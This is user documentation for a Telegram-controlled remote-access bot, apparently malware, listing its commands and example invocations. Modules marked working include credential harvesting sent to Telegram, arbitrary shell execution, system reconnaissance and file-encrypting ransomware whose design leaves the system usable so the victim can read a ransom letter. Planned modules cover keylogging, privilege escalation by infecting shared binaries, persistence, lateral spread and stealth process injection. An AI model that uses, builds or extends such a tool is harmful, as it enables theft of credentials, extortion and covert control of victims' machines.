This is the documentation for the modules included by default. You can roll your own if you know how to code in any of the supported languages.
Blocks like this represent what you would usually write in the Telegram chat
Log in using the bot password from the password.txt file, which allows you to run privileged commands/modules
WORKING
/login thisismypassword
Backs up the selected path, letting you choose between different levels of compression and password encryption. Gives you a link to the uploaded files
Not Working/In Current Development
/backup /home/documents/ 11
Runs C++ code and returns the output to Telegram
Uses the system-installed g++ command
WORKING
/cpp #include <iostream>
int main() {
    std::cout << "Hello!";
    return 0;
}
Generates a PCAP network traffic capture and uploads it to Telegram
Not Developed Yet
/dumpNetwork
Finds multiple files that hold sensitive information, creates a JSON and returns it to Telegram
WORKING
/findCredentials
Gathers information about the system: public IP address, operating system version, kernel version, hardware, number of packages installed, etc. Returns the information to Telegram
WORKING
/getClientInfo
Runs GoLang code and returns the output to Telegram
Uses the system-installed Go command
WORKING
/go package main
import "fmt"
func main() {
    fmt.Println("Hello!")
}
Returns information about available modules to Telegram
WORKING
/help
Runs JavaScript code and returns the output to Telegram
Uses the system-installed node command. It is not the same process as the Telegram bot
WORKING
/js console.log(new Date());
Captures keyboard keys and returns them to Telegram after the selected number of keys has been captured
Not Developed Yet
/keylogger 1000
Runs Lua code and returns the output to Telegram
Uses the system-installed lua command
WORKING
/lua print("Hello")
Escalates privileges to root using a known exploit or, if there isn't an available vulnerability for the system, assists you in performing an advanced privilege escalation using social engineering (for example, infecting shared binaries and waiting for a root user to start a shell to get privileges)
Not Developed Yet
/pe
Gets persistence on the system to make sure the bot keeps running even if it is removed, its dependencies are removed or the process is killed
Not Developed Yet
/persistence
Tries to propagate the bot to other systems, media storage, external devices or network devices
Not Developed Yet
/pivot
Runs Python code and returns the output to Telegram
Uses the system-installed python command
WORKING
/python print(f"""Hello!
How
Are
You?
""")
Encrypts all the files under the indicated path, using a key derivation from your key and the indicated compression strength. Some folders are ignored by default, so that you don't break the system, the bot continues to work and the user can use the system to read the ransomware letter you send
- Brotli compression is used to improve times, reduce size and increase security
- Known cryptography (AES-256 + Camellia-256 + AES-256, CBC with different IVs) is used by default (OpenSSL implementations)
- Known key derivations (base64, sha512) are used by default
- Custom XOR encryption is added too (2 layers, using different key derivations) just as an extra. (I think it will help in case known vulnerabilities in OpenSSL arrive some day, or to make quantum computers' job of cracking a bit more difficult)
WORKING
/ransomware e password /home 1
/ransomware d password /home 1
Runs commands on the system (in a default subshell) and returns the output to Telegram
WORKING
/run ls -la
Scans the local networks to find available services and devices and returns the result to Telegram
Not Developed Yet
/scanNetwork
Sends an email using a free service
Not Developed Yet
/sendMail from@freeprovider.tld myPassword Hello Hey How are you doing? destination@example.com
Removes any traces of infection, injects itself into another process's memory, goes to sleep for the time indicated, runs the bot without dependencies, changes the footprint
Not Developed Yet
/stealth 21h